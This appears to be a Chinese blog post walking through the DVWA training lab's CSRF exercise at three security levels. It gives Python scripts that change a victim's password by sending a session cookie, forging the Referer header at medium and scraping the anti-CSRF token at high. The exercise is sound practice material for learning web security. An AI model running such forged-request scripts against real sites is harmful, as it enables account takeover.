您的位置:首页 > 其它

DVWA - CSRF (low, medium, high)

2017-01-06 14:12 435 查看

low

设置一下cookie的PHPSESSID和security即可跨站请求

import requests

def main():
url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php'
headers = {
'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=low',
}
new_password = 'ac'
url = '%s?password_new=%s&password_conf=%s&Change=Change' % (url, new_password, new_password)
res = requests.get(url, headers=headers)
if 'Password Changed.' in res.content:
print('Yes')
else:
print('No')

if __name__ == '__main__':
main()


medium

查看源码,发现

// Checks to see where the request came from
if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) )


根据Referer验证请求来源,绕过思路:在HTTP请求头声明Referer。

import requests

def main():
url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php'
headers = {
'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=medium',
'Referer': 'http://192.168.67.22/dvwa/vulnerabilities/csrf/'
}
new_password = 'ac'
url = '%s?password_new=%s&password_conf=%s&Change=Change' % (url, new_password, new_password)
res = requests.get(url, headers=headers)
if 'Password Changed.' in res.content:
print('Yes')
else:
print('No')

if __name__ == '__main__':
main()


high

查看源码,发现多了动态user_token验证

// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );


绕过思路:在代码层面发跨站请求动态获取user_token,再发跨站请求修改密码。

import requests
import re

def main():
url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php'
headers = {
'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=high',
'Referer': 'http://192.168.67.22/dvwa/vulnerabilities/csrf/'
}
res = requests.get(url, headers=headers)
m = re.search(r"user_token' value='(.*?)'", res.content, re.M | re.S)
if m:
user_token = m.group(1)
new_password = 'ac'
url = '%s?password_new=%s&password_conf=%s&user_token=%s&Change=Change' % (url, new_password, new_password, user_token)
res = requests.get(url, headers=headers)
if 'Password Changed.' in res.content:
print('Yes')
else:
print('No')
print(res.content)

if __name__ == '__main__':
main()


注:这3个实验要跨站,别一直都在本地同一个浏览器测试,这没意思。
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签:  security
相关文章推荐
新的分享
章节导航